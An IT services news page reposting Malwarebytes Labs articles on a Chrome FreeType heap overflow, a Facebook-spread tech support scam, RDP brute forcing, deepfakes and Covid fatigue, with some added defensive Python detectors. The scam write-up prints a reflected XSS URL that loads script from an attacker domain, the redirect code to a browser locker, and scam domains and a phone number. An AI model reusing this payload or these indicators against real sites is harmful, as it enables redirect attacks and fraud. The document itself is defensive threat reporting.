IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Google patches actively exploited zero-day bug that affects Chrome users

Google has recently released Chrome version 86.0.4240.111 to patch several holes. One is for a zero-day flaw – that means a vulnerability that is being actively exploited in the wild.

The flaw, which is officially designated as CVE-2020-15999, occurs in the way FreeType handles PNG images embedded in fonts using the Load_SBit_Png function. FreeType is a popular text rendering library that Chrome uses. According to the bug report filed by Sergei Glazunov, a security researcher from Google’s very own Project Zero team, the function has the following tasks:

1) Obtains the image width and height from the header as 32-bit integers.
2) Truncates the obtained values to 16 bit and stores them in a ‘TT_SBit_Metrics’ structure.
3) Uses the truncated values to calculate the bitmap size.
4) Allocates the backing store of that size.
5) Passes ‘png_struct’ and the backing store to a libpng function.

Glazunov further explains that since the libpng function uses the original 32-bit values instead of the truncated 16-bit values, a heap buffer overflow in FreeType could occur if the PNG’s width and/or height exceeds 65535, the highest value a 16-bit integer can store: the backing store is sized from the truncated values, while libpng writes according to the full ones. This would result in certain pieces of data being overwritten or corrupted and, overall, the program behaving differently. So, anyone who successfully exploits this bug could achieve either remote execution of malicious code in the context of the browser or a complete compromise of the affected system.
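The size mismatch in steps 2 to 5 can be checked for from the defender's side. The following is an added example, not code from FreeType, Chrome or the original post: it scans a byte blob for embedded PNG headers and reports any whose dimensions do not fit in 16 bits. The 4-bytes-per-pixel bitmap format, the function names and the sample blob are assumptions made for illustration.

```python
import struct

PNG_SIG = b"\x89PNG\r\n\x1a\n"
BYTES_PER_PIXEL = 4  # assumption: the decoded bitmap is 32-bit BGRA


def embedded_png_dims(blob):
    """Yield (offset, width, height) for every PNG IHDR found in blob."""
    pos = blob.find(PNG_SIG)
    while pos != -1:
        ihdr = blob[pos + 8:pos + 24]  # chunk length, chunk type, width, height
        if len(ihdr) == 16 and ihdr[4:8] == b"IHDR":
            width, height = struct.unpack(">II", ihdr[8:16])
            yield pos, width, height
        pos = blob.find(PNG_SIG, pos + 1)


def size_mismatch(width, height):
    """Model steps 2-5 of the bug report; return (allocated, written) in bytes."""
    w16, h16 = width & 0xFFFF, height & 0xFFFF   # step 2: truncate to 16 bits
    allocated = w16 * BYTES_PER_PIXEL * h16      # steps 3-4: buffer sized from truncated values
    written = width * BYTES_PER_PIXEL * height   # step 5: decoder works from the 32-bit values
    return allocated, written


def scan_font(blob):
    """Return one finding per embedded PNG whose width or height exceeds 65535."""
    findings = []
    for offset, width, height in embedded_png_dims(blob):
        if width > 0xFFFF or height > 0xFFFF:
            allocated, written = size_mismatch(width, height)
            findings.append({"offset": offset, "width": width, "height": height,
                             "allocated": allocated, "written": written})
    return findings


def _png_header(width, height):
    """Constructed sample data: PNG signature plus the start of an IHDR chunk."""
    return PNG_SIG + struct.pack(">I4sII", 13, b"IHDR", width, height)


# Constructed stand-in for a font file carrying two embedded bitmap glyphs:
# a normal 64x64 image and one whose width (65537) truncates to 1.
SAMPLE_FONT = (b"\x00" * 32 + _png_header(64, 64) +
               b"\x00" * 16 + _png_header(65537, 2))

if __name__ == "__main__":
    for finding in scan_font(SAMPLE_FONT):
        print(finding)
```

For the oversized sample the model allocates 8 bytes while the decoder would produce 524296, which is the gap the heap overflow lives in.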

Google didn’t further elaborate on how CVE-2020-15999 is being exploited to target its users, or who is possibly behind the exploitation.

Update your Chrome now

Chrome users are advised to update to the current browser version, 86.0.4240.111, to protect themselves from getting exploited. Development teams who use the same FreeType libraries should update to FreeType 2.10.4.

The post Google patches actively exploited zero-day bug that affects Chrome users appeared first on Malwarebytes Labs.

The value of cybersecurity integration for MSPs

For modern Managed Service Providers (MSPs), gone are the days of disparate workflows, and that’s really for the best.

Imagine trying to run a successful MSP business today—finding potential customers, procuring new clients, developing purchase orders, managing endpoints, and sending invoices—all without the help of Remote Monitoring and Management (RMM) and Professional Services Automation (PSA) tools. It would be ludicrous.

Why then should MSPs accept that another critical part of their daily workload does not integrate with their current product workstack—cybersecurity?

The short answer is they shouldn’t. With an increasingly complex threat landscape which includes evolving ransomware strategies and trickier phishing scams, MSPs need to be on their A-game. Further, as Malwarebytes Labs showed, medium-sized and enterprise businesses suffered dramatic hits to their cybersecurity postures due to the coronavirus pandemic, and the small businesses that many MSPs protect are likely suffering similar pains.

The very nature of the MSP business demands integration. MSPs should ask the same from their cybersecurity solutions, allowing them to streamline their endpoint security practice with automated endpoint detection and deployment, advanced remediation, and simplified administration.

Why integration helps MSPs and their clients

MSPs today have likely been bombarded by the same arguments favoring RMM and PSA software—these products save time and make money. RMM tools mean no more driving to a physical site, no more scheduled check-ins where a client may have zero IT issues or a critical IT issue that only drags a team down for the rest of the day, and no more unreliability. Remotely addressing a client’s needs is a necessary component of today’s workload.

PSAs offer similar benefits in different areas. These tools can take disparate data flows and collate them into one source of truth. They can automate the generation and hand-off of data to prevent any human error from, for instance, an MSP’s marketing team to its sales team. These tools can also take vital billing data and transform it into trustworthy invoices, making sure that the countless hours of hard work get counted. And they can document purchase orders and make them easily accessible to every MSP employee that needs them. These tools can, in effect, remove the silos of chaos.

These benefits are obvious, and they help not just MSPs, but the clients that MSPs protect.

Being able to immediately field an IT request ticket from a client helps that client, increases their satisfaction, and lets them get back to their job more quickly. Automatically compiling service agreements for multiple clients means fewer opportunities for lost details or mistakes.

These things just make sense. But for MSPs, one of the most crucial roles they perform for clients can sometimes fall beyond the scope of most PSAs. That’s cybersecurity.

Benefits of cybersecurity integration

Every expert MSP knows that their job is more than just fixing IT issues as they happen. It’s also helping clients prevent computer issues before they can have a chance to occur. This doesn’t just help the clients, either, but it helps the many MSP tech workers already slammed with daily requests.

For an MSP, the more endpoints it manages that are already protected with a strong cybersecurity solution, the more endpoints that MSP won’t have to worry about, which means the more time that employees can devote full, personalized attention to the clients suffering other computer issues.

Unfortunately, while RMM and PSA tools have been the standard for decades, the integration of cybersecurity software into these tools is more recent. For years now, MSPs have been forced to sometimes go back to the disparate setups that their industry helped solve—logging into multiple applications to manage the same endpoint.

It didn’t make sense more than 10 years ago and it doesn’t make sense today.

MSPs should consider cybersecurity solutions that integrate directly with their PSA and RMM tools to prevent this repeated splintering of a workload.

Further, having an integrated cybersecurity solution can help an MSP better protect its clients. The integration will allow an MSP to more easily recommend that cybersecurity solution for clients when drafting up service agreements, and a protected client is just as important for the client as it is for the MSP helping them.

After all, so much of the job is cybersecurity, and that means protecting an endpoint before an attack hits, not just after.

The right, always-on, integrated cybersecurity solution will protect clients and their endpoints from disruptive ransomware attacks, sneaky phishing scams, unsafe websites injected with harmful code like credit card skimmers, and dangerous attachments sent through malicious emails. And when something does sneak through? MSPs can then easily rely on their RMM and PSA platforms to get a master-level view of what’s gone wrong, addressing and fixing the issue without having to navigate separate applications with potentially different logins, user interfaces, and data export settings.

There’s no reason to go back to disparate workflows. The MSP industry has been there, and it’s rightfully moved beyond it.

It should do the same when picking a cybersecurity solution for both itself and its clients.

The post The value of cybersecurity integration for MSPs appeared first on Malwarebytes Labs.

XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability

Tech support browser lockers continue to be one of the most common web threats. Not only are they a problem for end users who might end up on the phone with scammers defrauding them of hundreds of dollars, they’ve also caused quite the headache for browser vendors to fix.

Browser lockers are only one element of a bigger plan to redirect traffic from certain sites, typically via malvertising chains from adult portals or sites that offer pirated content.

There’s a slightly different campaign that we’ve been tracking for several weeks due to its high volume. Threat actors are relying on Facebook to distribute malicious links that ultimately redirect to a browser locker page. Their approach is interesting because it involves a few layers of deception including abusing a cross-site scripting vulnerability (XSS) on a popular website.

Malicious links shared via Facebook

Links posted onto social media platforms should always be scrutinized as they are a commonly abused way for scammers and malware authors to redirect users onto undesirable content. For this reason, you might see a disclaimer when you click on a link, warning you that it could be spam or dangerous.

The campaign we looked at appears to exclusively use links posted on Facebook, which is fairly unusual considering that traditionally tech support scams are spread via malvertising. Facebook displays a warning for the user to confirm that they want to follow the link. In this case, the destination is further obscured by the fact that the link is a bit.ly shortened URL.


The threat actor is using the bit.ly URL shortener to craft the first stage of redirection. In total, we catalogued 50 different bit.ly links (see IOCs) over a 3-month period, suggesting that there is regular rotation to avoid blacklisting.

Although we do not know exactly how these links are being shared with Facebook users, we have some indication that certain games (i.e. apps on the Facebook site) may help to spread them. Because this is out of our reach, we have alerted Facebook in case it is able to identify the exact source.

Abuse of cross-site scripting vulnerability

The bit.ly URL triggers the second stage redirection that involves a Peruvian website (rpp[.]pe) which contains a cross-site scripting vulnerability (XSS) that allows for an open redirect. Threat actors love to abuse open redirects as it gives some legitimacy to the URL they send victims. In this instance, the news site is perfectly legitimate and draws over 23 million visits a month.

In this case, we can see that code is being passed into the URL in order to load external JavaScript code from buddhosi[.]com, a malicious domain controlled by the attackers.

rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}

The JavaScript in turn creates the redirection to the browlock landing page by using the replace() method:

top.location.replace('https://BernetteJudeTews[.]club/home/anette/?nr=855-472-1832&'+window.location.search.substring(1));

Besides redirecting users to other sites, an attacker could exploit the XSS to rewrite the current page into anything they like.


We reported this issue to Grupo RPP but have not heard back at the time of publication.
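A defender-side view of the reflected search parameter described above, as an added example that is not code from the original post or from the affected site: it flags logged request URLs whose query values carry markup, extracts the host of any injected script source, and shows the output encoding that stops the reflection. The host names, sample URLs and function names are constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Markup that has no business inside a search term.
MARKUP = re.compile(r"<\s*(script|iframe|img|svg)\b|\bon\w+\s*=|javascript:", re.I)
# Captures the URL a reflected <script> tag would load.
SCRIPT_SRC = re.compile(r"<\s*script[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def suspicious_params(url):
    """Return [(param, script_host_or_None)] for query values that carry markup."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # parse_qsl has already percent-decoded the value (%3C -> <, %27 -> ').
        if MARKUP.search(value):
            match = SCRIPT_SRC.search(value)
            host = urlsplit(match.group(1)).hostname if match else None
            hits.append((name, host))
    return hits


def flag_requests(urls):
    """Return (url, hits) for every logged request with at least one hit."""
    flagged = []
    for url in urls:
        hits = suspicious_params(url)
        if hits:
            flagged.append((url, hits))
    return flagged


def render_results_heading(term):
    """Hardened reflection: encode the term for an HTML context before echoing it."""
    return "<h1>Results for: " + html.escape(term, quote=True) + "</h1>"


# Constructed proxy-log URLs; the second has the same shape as the link in the
# article, with placeholder host names.
SAMPLE_REQUESTS = [
    "https://news.example/buscar?q=hoy&fbclid=abc123",
    "https://news.example/buscar?q=hoy%3Cscript%20src=%27https://cloak.example"
    "/210c/?x.js%27%3E%3C/script%3E&fbclid=abc123",
]

if __name__ == "__main__":
    for url, hits in flag_requests(SAMPLE_REQUESTS):
        print(hits, url)
    print(render_results_heading("hoy<script src='https://cloak.example/x.js'></script>"))
```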

Cloaking domains

The open redirect trick is something that was added later on in the campaign. Originally the threat actors were directly loading decoy cloaking domains. Their purpose is to check incoming traffic and only serve the malicious content to legitimate victims. This is a very common practice and we’ve seen this before, for example with fake recipe sites.

We documented 6 domains involved in this third stage of the redirection process:

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Server-side checks ensure visitors meet the requirements, namely a legitimate US residential IP address, and custom JavaScript is then served (an empty JavaScript is returned for non-interesting traffic).

The code (shared above) loads the browser locker landing page hosted on one of the disposable and randomly-named domains using one of the newer TLDs:

.casa
.site
.space
.club
.icu
.bar

We collected close to 500 such domains (see IOCs) during a period of a few months, but there are likely many more.

Browser locker at the end of the chain

The browser locker fingerprints the user to display the appropriate version for their browser. It shows an animation mimicking a scan of current system files and threatens to delete the hard drive after five minutes.


Of course this is all fake, but it’s convincing enough that some people will call the toll-free number for assistance. In all, we collected almost 40 different phone numbers (see IOCs) but this is not an exhaustive list.


This is where it ends for the traffic scheme, but where it truly begins for the tech support scam. We did not make contact with the call centre, but we know very well how this next part plays out.

Malwarebytes users were already protected against this browser locker, thanks to our Browser Guard web protection. We will continue to track and report this campaign.


Thanks to Marcelo Rivero for helping with the replay and Manuel Caballero for his insights on the XSS.

Indicators of Compromise

Bitly links


Cloaking domains

buddhosi[.]com
joinspinclass[.]com
suddhosi[.]com
thourwiringus[.]com
totalgodin[.]com
tuoliushigao[.]com

Browlock domains


Phone numbers


The post XSS to TSS: tech support scam campaign abuses cross-site scripting vulnerability appeared first on Malwarebytes Labs.

Brute force attacks increase due to more open RDP ports

While leaving your back door open while you are working from home may be something you do without giving it a second thought, having unnecessary ports open on your computer is a security risk that is sometimes underestimated. That’s because an open port can be subject to brute force attacks.

What are brute force attacks?

A brute force attack is where an attacker tries every way he can think of to get in. Including throwing the kitchen sink at it. In cases where the method they are trying is to get logged in to your system, they will try endless combinations of usernames and passwords until a combination works.

Brute force attacks are usually automated, so it doesn’t cost the attacker a lot of time or energy. Certainly not as much as individually trying to figure out how to access a remote system. Based on a port number or another system specific property, the attacker picks the target and the method and then sets his brute force application in motion. He can then move on to the next target and will get notified when one of the systems has swallowed the hook.

Brute force methods

When trying to gain access to a remote system, an attacker will use one of these different types of attacks:

  • Reverse brute force attack. This type uses a common password or collection of passwords against many possible usernames. Sometimes the attacker may have an idea about the username or a part thereof. For example, they may know that a specific organization uses {first name}@{organization} as the default username for their employees. The attacker can then try a specific list of usernames and random passwords.
  • Credential stuffing is a type of attack where the criminal has a database of valid username and password combinations (usually stolen from other breaches) and tries out all these combinations on different systems. This is why it is never a good idea to reuse your passwords.
  • A hybrid brute force attack starts with the most feasible combinations and then keeps on trying from there. It often uses a dictionary attack where the application tries usernames or passwords using a dictionary of possible strings or phrases.
  • Rainbow table attacks only work when the attacker has some knowledge about the password they are trying to guess. In these attacks rainbow tables are used to recover a password based on its hash value. A rainbow table is a hash function used in cryptography for storing important data such as passwords in a database.

Brute forcing RDP ports

RDP attacks are one of the main entry points when it comes to targeted ransomware operations. To increase effectiveness, ransomware attacks are getting more targeted and one of the primary attack vectors is the Remote Desktop Protocol (RDP). Remote desktop is exactly what the name implies, an option to remotely control a computer system. It almost feels as if you were actually sitting behind that computer. Which is exactly what makes an attacker with RDP access so dangerous.

Because of the current pandemic, many people are working from home and may be doing so for a while to come. Working from home has the side effect of more RDP ports being opened. Not only to enable the workforce to access company resources from home, but also to enable IT staff to troubleshoot problems on the workers’ devices. A lot of enterprises rely on tech support teams using RDP to troubleshoot problems on employees’ systems.

But ransomware, although prevalent, is not the only reason for these types of attacks. Cybercriminals can also install keyloggers or other spyware on target systems to learn more about the organization they have breached. Other possible objectives might be data theft, espionage, or extortion.

Protect against brute force attacks

We’ve posted recommendations to protect against RDP attacks before. You can read more details in that post but basically the protection measures come down to:

  • Limit the number of open ports
  • Restrict the access to those that need it
  • Enhance security of the port and the protocol

The same basic security measures apply to other ports. In cybersecurity, the term open port refers to a TCP or UDP port number that is configured to accept packets. In contrast, a port which rejects connections or ignores all packets is a closed port. The fewer open ports you have facing the internet, the safer it is. Limiting the number of open ports is a good start but closing all of them is almost never feasible.

For the ports that need to remain open and where you do expect visitors, it’s a good idea to disable legacy usernames, rotate passwords, and use 2FA if you can.

Security software guarding the entire network should raise alarm bells when a great number of attempts are detected. Anything that behaves like a brute force attack will look so different from normal login attempts that it shouldn’t be a problem if it is blocked. When a brute force attacker gets locked out for a few minutes after a few failed attempts, this will slow them down a lot and give you ample opportunity to take corrective and defensive measures.
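The lockout behaviour described above can be replayed over login events to see how far it slows a guesser down. This is an added example, not code from the original post or from any Malwarebytes product; the thresholds (5 failures in 60 seconds, 300-second lockout), the cut-off of more than 3 usernames for labelling a reverse brute force attack, and the event records are all constructed assumptions.

```python
from collections import defaultdict, deque


class LockoutPolicy:
    """Lock a source out for `lockout` s after `max_failures` failures in `window` s."""

    def __init__(self, max_failures=5, window=60, lockout=300):
        self.max_failures, self.window, self.lockout = max_failures, window, lockout
        self.failures = defaultdict(deque)  # source -> timestamps of recent failures
        self.locked_until = {}              # source -> time at which the lockout ends

    def attempt(self, ts, source, success):
        """Return 'blocked', 'ok' or 'failed' for one login attempt at time ts."""
        if ts < self.locked_until.get(source, 0):
            return "blocked"                # even a correct password is refused
        if success:
            self.failures.pop(source, None)
            return "ok"
        recent = self.failures[source]
        recent.append(ts)
        while recent and recent[0] <= ts - self.window:
            recent.popleft()                # forget failures outside the window
        if len(recent) >= self.max_failures:
            self.locked_until[source] = ts + self.lockout
            recent.clear()
        return "failed"


def replay(events, policy):
    """Run (ts, source, user, success) events through the policy; tally per source."""
    summary = defaultdict(lambda: {"failed": 0, "blocked": 0, "ok": 0, "users": set()})
    for ts, source, user, success in sorted(events):
        summary[source][policy.attempt(ts, source, success)] += 1
        summary[source]["users"].add(user)
    return summary


def alerts(summary):
    """Sources that tripped the lockout, labelled by how many usernames they tried."""
    out = []
    for source, s in sorted(summary.items()):
        if s["blocked"]:
            kind = "reverse brute force" if len(s["users"]) > 3 else "password guessing"
            out.append((source, kind, s["failed"], s["blocked"]))
    return out


# Constructed events: one guess per second against a single account for ten
# minutes, eight usernames tried from a second source, and a user's typo.
SAMPLE_EVENTS = (
    [(t, "198.51.100.7", "administrator", False) for t in range(600)]
    + [(100 + 2 * i, "203.0.113.9", "user%d" % i, False) for i in range(8)]
    + [(10, "10.0.0.15", "alice", False), (25, "10.0.0.15", "alice", True)]
)

if __name__ == "__main__":
    for alert in alerts(replay(SAMPLE_EVENTS, LockoutPolicy())):
        print(alert)
```

In the replay only 10 of the 600 automated guesses are evaluated at all, and the user who mistyped a password once is never locked out.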

It’s a numbers game

Many open ports can be used in a brute force attack, but RDP ports are the most desirable for anyone trying to gain access. RDP is easier because the attacker may have a reasonable idea about the username and only needs to brute force the password. It also offers a successful attacker a good chance to infiltrate the organization’s network further.

As mentioned earlier, the shift to working from home has caused a big rise in the number of open RDP ports around the globe. The number of RDP ports exposed to the Internet grew from about three million in January 2020 to over four and a half million in March. At Malwarebytes we noticed a similar surge in compromised servers that are used to run brute force tools or scan the Internet for vulnerable ports. Malwarebytes protects its customers by blocking the traffic from these IP addresses.

Malwarebytes blocks compromised IPs

And please don’t think this can’t happen to your organization. We’ve seen high profile companies fall victim to ransomware where the suspected point of entry was an open RDP port.

Stay safe everyone!

The post Brute force attacks increase due to more open RDP ports appeared first on Malwarebytes Labs.

A week in security (October 12 – October 18)

Last week on Malwarebytes Labs, we looked at journalism’s role in cybersecurity on our Lock and Code podcast, gave tips for safer shopping on Amazon Prime day, and discussed an APT attack springing into life as Academia returned to the real and virtual campus environment. We also dug into potential FIFA 21 scams, the return of QR code scams, Covid fatigue, and the absence of Deepfakes from the 2020 US elections.

Other cybersecurity news

  • Coronavirus SMS spoof risk: Researcher warns that genuine messages can be impersonated (Source: The Register)

Stay safe, everyone!

The post A week in security (October 12 – October 18) appeared first on Malwarebytes Labs.

Deepfakes and the 2020 United States election: missing in action?

If you believe reports in the news, impending deepfake disaster is headed our way in time for the 2020 United States election. Political intrigue, dubious clips, mischief and mayhem were all promised. We’ll need to be careful around clips of the President issuing statements about being at war, or politicians making defamatory statements. Everything is up for grabs, and in play, or at stake. Then, all of a sudden…it wasn’t.

Nothing happened. Nothing has continued to happen. Where did our politically charged deepfake mayhem go to? Could it still happen? Is there time? With all the increasingly surreal things happening on a daily basis, would anybody even care?

The answer is a cautious “no, they probably wouldn’t.” As we’ve mentioned previously, there are two main schools of thought on this. Shall we have a quick refresher?

Following the flow

Stance 1: Catastrophe and chaos rain down from the heavens. The missiles will launch. Extreme political shenanigans will cause skulduggery and intrigue of the highest order. Democracy as we know it is imperilled. None of us will emerge unscathed. Deepfakes imperil everything.

Stance 2: Deepfakes have jumped the shark. They’d have been effective political tools when nobody knew about them. They’re more useful for subversive influence campaigns off the beaten track. You have to put them in the places you least expect, because people quite literally expect them. They’re yesterday’s news.

Two fairly diverse stances, and most people seem to fall in one of the two camps. As far as the US election goes, what is the current state of play?

2020 US election: current state of play

Imagine our surprise when instead of deepfaked election chaos, we have a poorly distorted gif you can make on your phone. It’s heralded as the first strike of deepfakes “for electioneering purposes”.

It’s dreadful. Something you’d see in the comment section of a Myspace page, as pieces of face smear and warp this way and that. People are willing to call pretty much anything a deepfake to add weight to their points. The knock-on effect of this is overload and gradual disinterest due to hype. Things many would consider a deepfake are turned away at the door as a result of everything in sight being called a deepfake.

This is a frankly ludicrous situation. Even so, outside of the slightly tired clips we’ve already seen, there doesn’t appear to be any election inroad for scammers or those up to no good.

What happened to my US election deepfakes?

The short answer is people seem to be much more taken with pornographic possibilities than bringing down Governments. According to Sensity data, the US is the most heavily targeted nation for deepfake activity. That’s some 45.4%, versus the UK in second place with just 10.4%, South Korea with 9.1%, and India at 5.2%. The most popular targeted sector is entertainment with 63.9%, followed by fashion at 20.4%, and politics with a measly 4.5%.

We’ve seen very few (if any) political deepfakes aimed at South Korean politicians. For all intents and purposes, they don’t exist. What there is an incredible amount of, are pornographic fakes of South Korean K-Pop singers shared on forums and marketplaces. This probably explains South Korea’s appearance in third place overall and is absolutely contributing to the high entertainment sector rating.

Similarly adding to both US and entertainment tallies, are US actresses and singers. Again, most of those clips tend to be pornographic in nature. This isn’t a slow trickle of generated content. It’s no exaggeration to say that one single site will generate pages of new fakes per day, with even more in the private/paid-for sections on their forums.

This is awful news for the actresses and singers currently doomed to find themselves uploaded all over these sites without permission. Politicians, for the most part, get off lightly.

What are we left with?

Besides the half dozen or so clips from professional orgs saying “What if Trump/Obama/Johnson/Corbyn said THIS” with a clip of said politician saying it (and they’re not that great either), it’s basically amateur hour out there. There’s a reasonably consistent drip-feed of parody clips on YouTube, Facebook, and Twitter. It’s not Donald Trump declaring war on China. It isn’t Joe Biden announcing an urgent press briefing about Hillary Clinton’s emails. It’s not Alexandria Ocasio-Cortez telling voters to stay home because the local voting station has closed.

What it is, is Donald Trump and Joe Biden badly lip-syncing their way through Bohemian Rhapsody on YouTube. It’s Trump and Biden talking about a large spoon edited into the shot with voices provided by someone else. I was particularly taken by the Biden/Trump rap battle doing the rounds on Twitter.

As you may have guessed, I’m not massively impressed by what’s on offer so far. If nothing else, one of the best clips for entertainment purposes I’ve seen so far is from RT, the Russian state-controlled news network. 

Big money, minimal returns?

Consider how much money RT must have available for media projects, and what they could theoretically sink into something they clearly want to make a big splash with. And yet, for all that…it’s some guy in a Donald Trump wig, with an incredibly obviously fake head pasted underneath it. The lips don’t really work, the face floats around the screen a bit, evidently not sharing the same frame of reference as the body. The voice, too, has a distinct whiff of fragments stitched together.

So, a convincing fake? Not at all. However, is that the actual aim? Is it deliberately bad, so they don’t run a theoretical risk of getting into trouble somehow? Or is this quite literally the best they can do?

If it is, to the RT team who put it together: I’m sorry. Please, don’t cry. I’m aiming for constructive criticism here.

They’re inside the walls

Curiously, instead of a wave of super-dubious deepfakes making you lose faith in the electoral system, we’ve ended up with…elected representatives slinging the fakes around instead.

By fakes, I don’t mean typical “cheapfakes”, or photoshops. I mean actual deepfakes.

Well, one deepfake. Just one.

“If our campaign can make a video like this, imagine what Putin is doing right now”

Bold words from Democratic candidate Phil Ehr, in relation to a deepfake his campaign team made showing Republican Matt Gaetz having a political change of heart. He wants to show how video and audio manipulation can influence elections and other important events.

Educating the public in electioneering shenanigans is certainly a worthwhile goal. Unfortunately, I have to highlight a few problems with the approach:

  1. People don’t watch things from start to finish. Whole articles go unread beyond the title and maybe the first paragraph. TV shows progress no further than the first ad break. People don’t watch ad breaks. It’s quite possible many people will get as far as Matt Gaetz saying how cool he thinks Barack Obama is, then abandon ship under the impression it was all genuine.
  2. “If we can make a video like this” implies what you’re about to see is an incredible work of art. It’s terrible. The synthetic Matt Gaetz looks like he wandered in off the set of a PlayStation 3 game. The voice is better, but still betrayed by that halting, staccato lilt so common in audio fakery. One would hope the visuals being so bad would take care of 1), but people not really paying attention or with a TV on in the background are in for a world of badly digitised hurt.

An acceptable use of technology?

However you stack this one up, I think it’s broadly unhelpful to normalise fakes in this way during election cycles regardless of intention. Note there’s also no “WARNING: THIS IS FAKE” type message at the start of the clip. This is bad, considering you can detach media from Tweets and repurpose.

It’s the easiest thing in the world to copy the code for the video and paste it into your own Tweet minus his disclaimer. You could just as easily download it, edit out the part at the end which explains the purpose, and put it back on social media platforms. There are so many ways you can get up to mischief with a clip like this it’s not even funny.

Bottom line: I don’t think this is a good idea.

Fakes in different realms

Other organisations have made politically-themed fakes to cement the theoretical problems posed by deepfakes during election time, and these ones are actually quite good. You can still see the traces of uncanny valley in there though, and we must once again ask: is it worth the effort? When major news cycles rotate around things as basic as conspiracy theories and manipulation, perhaps fake Putin isn’t the big problem here.

If you were in any doubt as to where the law enforcement action is on this subject: it’s currently pornography. Use of celebrity faces in deepfakes is now officially attracting the attention of the thin blue line. You can read more on deepfake threats (political or otherwise) in this presentation by expert Kelsey Farish.

Cleaning up the house

That isn’t to say things might not change. Depending on how fiercely the US election battle is fought, strange deepfake things could still be afoot at the eleventh hour. Whether it makes any difference or not is another thing altogether, and if low-grade memes or conspiracy theories are enough to get the job done then that’s what people will continue to do.

Having said that: you can keep a watchful eye on possible foreign interference in the US election via this newly released attribution tracker. Malign interference campaigns will probably continue as the main driver of GAN generated imagery. Always be skeptical, regardless of suspicions over AI involvement. The truth is most definitely out there…it just might take a little longer to reach than usual.

The post Deepfakes and the 2020 United States election: missing in action? appeared first on Malwarebytes Labs.

How Covid fatigue puts your physical and digital health in jeopardy

After six months of social distancing, sheltering in place, working from home, distance learning, mask-wearing, hand-washing, and plenty of hand-wringing, people are pretty damn tired of COVID-19. And with no magic bullet (yet) and no end in sight, annoyance has turned into exasperation and even desperation.

Doctors and mental health professionals call this Covid fatigue.

Covid fatigue, not to be confused with fatigue as a symptom of the COVID-19 infection, can be characterized by denial, defeatism, and careless or reckless behavior in response to feeling overwhelmed and exhausted by a constant stream of pandemic-related information. And since COVID-19’s impact on our lives has been both profound and long-lasting, the fatigue is further pronounced by such prolonged exposure to intense stress. Conflicting information about the seriousness of the virus does little to provide relief. Instead, emotions are extra muddied by uncertainty about how stressed we should really be feeling.

Those of us in cybersecurity recognize this emotional response well. We’ve seen it play out in the digital realm in the form of security fatigue and alert fatigue, or what some doctors call “caution fatigue.” And we understand that if it isn’t addressed, it can lead to dangerous choices for the health and safety of people in the real world and online.

COVID-19 has upended nearly every facet of our lives, driving us into the open arms of the Internet like never before. Yet, as we struggle with anxiety and burnout related to the pandemic, our fatigue spills over into our online behavior. And with so many working and schooling from home, the stakes have never been higher.

So, when we see users exhibiting classic symptoms of Covid fatigue, security fatigue, or other caution fatigue, we feel their pain but recognize that this behavior can’t go on unchecked. If you think that you, your friends and family, or coworkers might be experiencing Covid fatigue, read on to learn how to recognize the symptoms, why they are dangerous, and what can be done to fight against it.

What is Covid fatigue?

To understand Covid fatigue, it helps to first zoom out and consider that fatigue is a natural response to any ongoing stressful situation or threat. When you couple that with the need to take specific actions to protect against that threat, you get caution fatigue. In an interview for a WebMD special report, Jacqueline Gollan, Associate Professor of Psychiatry and Behavioral Science at Northwestern’s Feinberg School of Medicine, explains what she means by the term caution fatigue:

“[Caution fatigue] is really low motivation or interest in taking safety precautions. It occurs because the constant state of being [on] alert for a threat can activate a stress hormone called cortisol, and that can affect our health and our brain function…When we’re subjected to high levels of stress, we start to desensitize to that stress. And then we begin to pay less attention to risky situations.”

Caution fatigue, then, can apply to numerous situations where individuals are under siege for an extended period of time and grow tired of being required to employ protective measures. This is especially true when the threat is not perceived as imminent or direct, and even more prominent when the threat is invisible. Other factors that increase caution fatigue include:

  • Lack of transparency into the threat or the reasons for the restrictions
  • Unfair or overly complicated restrictions or recommendations for safety precautions
  • Inconsistent actions and mixed messages about which measures are effective
  • Unpredictable changes to safety measures, including using subjective criteria to alter directions

Looking at this list in the context of the coronavirus pandemic, it appears we’ve checked off all the boxes, turning what was strong public support for COVID-19 response strategies into a collective case of the Mondays. According to an October report by the World Health Organization (WHO), pandemic fatigue has reached over 60 percent in some parts of Europe. In the United States, a July 2020 Kaiser Family Foundation poll found that 53 percent of Americans believed the pandemic had harmed their mental health.

WHO says that Covid fatigue is expressed through an increasing number of people not sufficiently following recommendations and restrictions, decreasing their effort to stay informed about the pandemic, and having lower risk perceptions related to COVID-19. Previously effective core messages about washing hands, wearing face masks, practicing proper hygiene, and maintaining physical distance may now be lost in the shuffle. Instead, vigilance is replaced by denial (I won’t get infected) or nihilism (we’re all screwed anyway, so I might as well do what I want).

What does Covid fatigue have to do with cybersecurity?

Covid fatigue shares characteristics with another form of fatigue that has long plagued the cybersecurity industry: security fatigue. In 2017, the National Institute of Standards and Technology (NIST) published a study stating that security fatigue was the threshold at which users found it too hard or burdensome to maintain security, a phenomenon affecting 63 percent of its participants.

The NIST report went further to say, “People are told they need to be constantly on alert, constantly ‘doing something,’ but they are not even sure what that something is or what might happen if they do or do not do it.”

Security fatigue and its cousin alert fatigue (which technicians are likely already familiar with) prevent users from taking definitive steps to protect themselves while connected to the Internet. Every news story on ransomware or major breach of personally identifiable information (PII) or cyberattack by a nation-state comes with its own set of “here’s how to protect against this” steps to follow.

Some of those instructions may be complex or incredibly specific, contributing to confusion (especially for those who aren’t tech savvy). Likewise, the constant pinging from alert notifications on security software may result in IT teams dismissing those alerts altogether.

Although there have been efforts to reduce security and alert fatigue, they likely make themselves known on a regular basis to anyone working in IT and security. For other users, security fatigue might flow as an undercurrent or barely register. But when you add Covid fatigue to the recipe, you get a dangerous cocktail of weary indifference.

Now, those with Covid fatigue aren’t just endangering themselves by ignoring best health practices and tuning out the latest news. They’re also letting their fatigue-influenced behavior spill over into other areas, including conducting business (or pleasure) online.

